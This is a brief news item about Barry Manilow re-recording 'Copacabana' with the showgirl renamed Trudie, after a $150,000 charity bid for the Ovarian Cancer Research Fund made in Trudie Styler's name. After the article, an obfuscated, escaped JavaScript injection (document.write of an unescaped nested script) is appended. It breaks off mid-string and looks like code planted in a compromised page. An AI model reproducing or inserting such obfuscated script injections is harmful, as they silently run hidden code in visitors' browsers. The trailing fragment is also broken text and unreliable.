You might remember the first lines of "Copacabana" as "Her name was Lola/She was a showgirl." Now it's going to be "Her name was Trudie/She was a showgirl." Barry Manilow and songwriting partner Bruce Sussman agreed to record a new version of the song with the name change as a way to raise money for the Ovarian Cancer Research Fund. The winning bid was 150-thousand dollars and was donated anonymously in the name of Trudie Styler, Sting's wife.
She happens to be receiving the fund's humanitarian award this year. Manilow plans to re-record the song but has not set a date.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
